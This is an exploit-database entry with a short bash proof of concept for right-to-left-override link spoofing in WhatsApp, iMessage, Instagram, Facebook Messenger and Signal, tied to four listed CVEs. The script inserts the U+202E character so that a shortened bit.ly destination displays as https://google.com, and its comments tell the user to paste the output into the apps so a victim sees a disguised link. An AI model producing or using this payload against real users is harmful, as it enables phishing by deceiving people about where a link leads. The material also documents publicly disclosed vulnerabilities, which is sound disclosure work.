# Exploit Title: RTLO Injection URI Spoofing: WhatsApp, iMessage (Messages app), Instagram, Facebook Messenger. CVE-2020-20093, CVE-2020-20094, CVE-2020-20095, CVE-2020-20096 # Date: 24/03/2022 # Exploit Authors: zadewg & Sick Codes # Vendor Homepage: https://www.meta.com # Vendor Homepage: https://www.instagram.com # Vendor Homepage: https://www.apple.com # Vendor Homepage: https://www.signal.org # Tested on: Whatsapp iOS # Version 2.19.80 and below # Tested on: Whatsapp Android # Version 2.19.222 and below # Tested on: Instagram iOS # Version: 106.0 and below # Tested on: Instagram iOS Android 107.0.0.11 # Version: 107.0.0.11 and below # Tested on: iMessage (Messages app) # Version: iOS 14.3 and below # Tested on: Facebook Messenger app iOS # Version: 227.0 and below # Tested on: Facebook Messenger app Android # Version: 228.1.0.10.116 and below # Tested on: Signal # Version: 5.33.0.25 and below # CVE: CVE-2020-20093 # CVE: CVE-2020-20094 # CVE: CVE-2020-20095 # CVE: CVE-2020-20096 #!/bin/bash # Author: sickcodes # Contact: https://twitter.com/sickcodes https://github.com/sickcodes # Copyright: sickcodes (C) 2022 # License: GPLv3+ # References: https://github.com/zadewg/RIUS # https://github.com/sickcodes/security/blob/master/exploits/SICK-2022-40.sh # https://sick.codes/sick-2022-40 APPEAR_AS='https://google.com' DESTINATION='bit.ly/3ixIRwm' printf "\n\n${APPEAR_AS}/\u202E${DESTINATION}\n\n" # copy paste into any of the above apps. # victim will see a surreptitious link # works on latest Signal (unpatched)